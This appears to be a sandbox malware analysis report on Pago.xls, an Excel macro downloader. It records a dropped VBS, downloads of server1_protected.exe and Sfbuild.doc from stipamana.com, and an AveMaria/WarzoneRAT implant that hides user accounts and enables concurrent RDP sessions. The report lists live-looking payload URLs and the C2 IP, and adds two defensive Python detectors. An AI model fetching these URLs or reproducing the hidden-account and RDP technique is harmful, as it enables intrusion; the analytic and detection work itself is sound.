                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: server1_protected[1].exe.5.dr, Module2.csCryptographic APIs: 'TransformFinalBlock'
                Source: NXRWIG.exe.5.dr, Module2.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@10/17@4/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8A44.tmpJump to behavior
                Source: .doc.4.drOLE indicator, Word Document stream: true
                Source: Pago.xlsOLE indicator, Workbook stream: true
                Source: Pago.xls.0.drOLE indicator, Workbook stream: true
                Source: 57230000.0.drOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Pago.xlsReversingLabs: Detection: 47%
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
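The process chain recorded above (Excel launching WScript on a .vbs dropped under the user's Recent folder, Word launching a PE from the same folder, and that PE relaunching itself) is what the Sigma hits in the summary key on. The following detector is an added example, not Joe Sandbox output or code from the sample: it runs the same three checks over constructed process-creation records whose paths are taken from this page (Sysmon-style field names, invented PIDs, and one invented benign Excel child as a control).

```python
"""Detection logic for the Office -> script host / dropped-binary chain above.

Added example, not Joe Sandbox output. Event records are constructed from the
process-creation entries on this page (field names follow Sysmon Event ID 1;
PIDs and the benign control event are invented).
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# User-writable folders in which a document should never be creating executables.
USER_DROP_DIRS = (
    "\\appdata\\roaming\\microsoft\\windows\\recent\\",
    "\\appdata\\local\\microsoft\\windows\\temporary internet files\\",
    "\\appdata\\local\\temp\\",
)
SCRIPT_ARG = re.compile(r'"?([^"\s]+\.(?:vbs|vbe|js|jse|wsf|hta|ps1))"?', re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process
    command_line: str


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_user_drop_dir(path: str) -> bool:
    lowered = path.lower()
    return any(d in lowered for d in USER_DROP_DIRS)


def _script_argument(cmdline: str) -> Optional[str]:
    m = SCRIPT_ARG.search(cmdline)
    return m.group(1) if m else None


def classify(ev: ProcEvent) -> List[str]:
    """Names of the rules an event trips; an empty list means benign."""
    hits: List[str] = []
    parent, child = _base(ev.parent_image), _base(ev.image)
    if parent in OFFICE_IMAGES:
        if child in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")
            script = _script_argument(ev.command_line)
            if script and _in_user_drop_dir(script):
                hits.append("script_from_user_drop_dir")
        elif _in_user_drop_dir(ev.image):
            hits.append("office_spawns_binary_from_user_drop_dir")
    # A freshly dropped binary relaunching itself is the usual prelude to
    # RunPE-style injection (NXRWIG.exe does it twice in this report).
    if parent == child and _in_user_drop_dir(ev.image):
        hits.append("dropped_binary_spawns_itself")
    return hits


def scan(events) -> Dict[int, List[str]]:
    """pid -> triggered rules, for every event that trips at least one rule."""
    return {ev.pid: rules for ev in events if (rules := classify(ev))}


# Constructed events mirroring this report's process tree (PIDs are invented).
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "explorer.exe",
              r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    ProcEvent(101, r"C:\Windows\System32\wscript.exe",
              r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"'),
    ProcEvent(200, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", "explorer.exe",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'),
    ProcEvent(201, r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe",
              r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"'),
    ProcEvent(202, r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe",
              r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe",
              r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"),
    # Invented benign control: Excel launching a helper from Program Files.
    ProcEvent(300, r"C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE",
              r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "DW20.EXE -x"),
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The three rules are deliberately independent: the script-host rule fires even when the script path is unknown, the drop-directory rule fires on the child image rather than the command line (so a renamed binary still trips it), and the self-spawn rule does not depend on an Office parent at all, which is what catches the second and third NXRWIG.exe instances whose parent is the first one.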
Source: C:\Windows\System32\wscript.exe; Section loaded: version.dll, sxs.dll, dwmapi.dll, cryptsp.dll, msisip.dll, webio.dll, credssp.dll, dnsapi.dll, iphlpapi.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, rasadhlp.dll, secur32.dll, ncrypt.dll, bcrypt.dll, gpapi.dll, msdart.dll, rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Section loaded: wow64win.dll, wow64cpu.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, bcrypt.dll, cryptsp.dll, rpcrtremote.dll, wow64win.dll, wow64cpu.dll, wow64win.dll, wow64cpu.dll
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\PROG-MAX\Desktop\TOPROTECT\Protected\server1_protected.pdb; source: NXRWIG.exe, 00000008.00000000.517113620.0000000000152000.00000020.00000001.01000000.00000004.sdmp, NXRWIG.exe.5.dr, server1_protected[1].exe.5.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe

                Hooking and other Techniques for Hiding and Protection

                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
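The strings above pair the SpecialAccounts\UserList key (which hides an account from the logon screen when its DWORD is 0) with TermService, rdpwrap.ini, fDenyTSConnections, EnableConcurrentSessions and AllowMultipleTSSessions, i.e. the registry surface an implant touches to add a hidden account and open a concurrent RDP session to it. The following hunt is an added example, not Joe Sandbox output or code from the sample: it evaluates those indicators over a registry snapshot. The key paths are the ones quoted on this page; the expected stock ServiceDll (termsrv.dll) is a known Windows default; the account name, the rdpwrap.dll path and both snapshots are constructed and hypothetical.

```python
"""Registry hunt for the hidden-account and RDP-takeover indicators above.

Added example, not Joe Sandbox output. Key paths are the ones quoted in the
strings on this page; the two snapshots below are constructed (hypothetical
account name and DLL path), not data recovered from the analysed sample.
"""
import ntpath
from typing import Dict, List

USERLIST = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
TERMSERV_PARAMS = r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters"
TERMSERV_CTRL = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
LICENSING_CORE = TERMSERV_CTRL + r"\Licensing Core"
WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# The only ServiceDll a stock TermService should ever point at.
EXPECTED_TERMSRV = "termsrv.dll"

# A snapshot is {key_path: {value_name: data}}; keys and value names are
# compared case-insensitively, as the registry itself does.
Snapshot = Dict[str, Dict[str, object]]


def _values(snap: Snapshot, key: str) -> Dict[str, object]:
    for k, values in snap.items():
        if k.lower() == key.lower():
            return values
    return {}


def _get(snap: Snapshot, key: str, name: str):
    for n, data in _values(snap, key).items():
        if n.lower() == name.lower():
            return data
    return None


def assess(snap: Snapshot) -> List[str]:
    """One finding string per indicator present in the snapshot."""
    findings: List[str] = []
    # 1. Accounts hidden from the logon screen (DWORD 0 under UserList).
    for account, data in _values(snap, USERLIST).items():
        if data == 0:
            findings.append(f"hidden account: {account}")
    # 2. TermService hijacked to a non-Microsoft DLL (RDP Wrapper style).
    dll = _get(snap, TERMSERV_PARAMS, "ServiceDll")
    if dll is not None and ntpath.basename(str(dll)).lower() != EXPECTED_TERMSRV:
        findings.append(f"TermService ServiceDll replaced: {dll}")
    # 3. RDP switched on plus the concurrent-session switches: the combination
    #    needed for a covert session alongside the interactive user.
    if _get(snap, TERMSERV_CTRL, "fDenyTSConnections") == 0:
        findings.append("RDP enabled (fDenyTSConnections=0)")
    if _get(snap, LICENSING_CORE, "EnableConcurrentSessions") == 1:
        findings.append("EnableConcurrentSessions=1")
    if _get(snap, WINLOGON, "AllowMultipleTSSessions") == 1:
        findings.append("AllowMultipleTSSessions=1")
    return findings


def collect_live() -> Snapshot:
    """Read the same keys from the local machine (Windows only; needs winreg)."""
    import winreg  # raises ImportError on non-Windows hosts
    snap: Snapshot = {}
    for key in (USERLIST, TERMSERV_PARAMS, TERMSERV_CTRL, LICENSING_CORE, WINLOGON):
        subkey = key.split("\\", 1)[1]  # strip the HKLM prefix
        values: Dict[str, object] = {}
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as handle:
                index = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(handle, index)
                    except OSError:
                        break
                    values[name] = data
                    index += 1
        except OSError:
            continue  # key absent: nothing to report for it
        snap[key] = values
    return snap


# Constructed snapshot of a host after such an implant has run (hypothetical).
COMPROMISED: Snapshot = {
    USERLIST: {"svc_backup": 0},
    TERMSERV_PARAMS: {"ServiceDll": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},
    TERMSERV_CTRL: {"fDenyTSConnections": 0},
    LICENSING_CORE: {"EnableConcurrentSessions": 1},
    WINLOGON: {"AllowMultipleTSSessions": 1},
}

# Constructed clean baseline: stock ServiceDll, RDP disabled, no UserList key.
CLEAN: Snapshot = {
    TERMSERV_PARAMS: {"ServiceDll": r"%SystemRoot%\System32\termsrv.dll"},
    TERMSERV_CTRL: {"fDenyTSConnections": 1},
}

if __name__ == "__main__":
    for line in assess(COMPROMISED):
        print(line)
```

On a live Windows host `assess(collect_live())` gives the same findings; a UserList key that exists at all is worth a look even when no value is 0, since stock Windows does not create it.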
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (21 occurrences)
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX (44 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process information set: NOOPENFILEERRORBOX (18 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Memory allocated: 370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Memory allocated: 22D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Memory allocated: 550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 3456; Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe TID: 3808; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process queried: DebugPort (4 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe; Domain query: www.stipamana.com
Source: C:\Windows\System32\wscript.exe; Network Connect: 87.121.86.205 443
Source: .doc.4.dr; OLE indicator, VBA stomping: true
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe; Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe VolumeInformation
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match; File source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: NXRWIG.exe PID: 3796, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match; File source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information431
                Scripting
                Valid Accounts33
                Exploitation for Client Execution
                431
                Scripting
                111
                Process Injection
                1
                Masquerading
                11
                Input Capture
                1
                Security Software Discovery
                Remote Services11
                Input Capture
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Obfuscated Files or Information
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory41
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol11
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading
                Logon Script (Windows)41
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Remote System Discovery
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS1
                File and Directory Discovery
                Distributed Component Object ModelInput Capture213
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets13
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Hidden Users
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1575112 | Sample: Pago.xls | Start date: 14/12/2024 | Architecture: WINDOWS | Score: 100
Root signatures: Found malware configuration | Malicious sample detected (through community Yara rule) | Antivirus detection for URL or domain | 22 other signatures
• EXCEL.EXE (node badges 32, 24) started
  • DNS/IP: www.stipamana.com 87.121.86.205, port 443 (local ports 49161, 49162), SKATTV-ASBG, Bulgaria
  • Dropped: C:\Users\user\Desktop\Pago.xls (Composite) | C:\Users\user\AppData\Roaming\...\VIPMEUV.vbs (ASCII) | C:\Users\user\...\cfhxdfhgjsxgfhxz[1].vbs (ASCII)
  • Signatures: Document exploit detected (creates forbidden files) | Microsoft Office drops suspicious files
  • wscript.exe (node badge 1) started
    • DNS/IP: www.stipamana.com
    • Dropped: C:\Users\user\AppData\Local\Temp\    .doc (Composite)
    • Signatures: System process connects to network (likely due to code injection or exploit) | Windows Scripting host queries suspicious COM object (likely to drop second stage)
• WINWORD.EXE (node badges 296, 22) started
  • Dropped: C:\Users\user\AppData\Roaming\...\NXRWIG.exe (PE32) | C:\Users\user\...\server1_protected[1].exe (PE32)
  • NXRWIG.exe started
    • Signatures: Antivirus detection for dropped file | Contains functionality to hide user accounts | Machine Learning detection for dropped file
    • NXRWIG.exe started
    • NXRWIG.exe started

                SourceDetectionScannerLabelLink
                Pago.xls47%ReversingLabsScript-Macro.Downloader.Heuristic
                Pago.xls100%AviraHEUR/Macro.Downloader.MRDO.Gen
                Pago.xls100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\ .doc100%AviraHEUR/Macro.Downloader.MRDO.Gen
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe100%AviraTR/Dropper.Gen
                C:\Users\user\AppData\Local\Temp\ .doc100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.stipamana.com | 87.121.86.205 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
dns.stipamana.com | false | | high
https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe | true | Avira URL Cloud: malware | unknown
https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc | true | Avira URL Cloud: malware | unknown
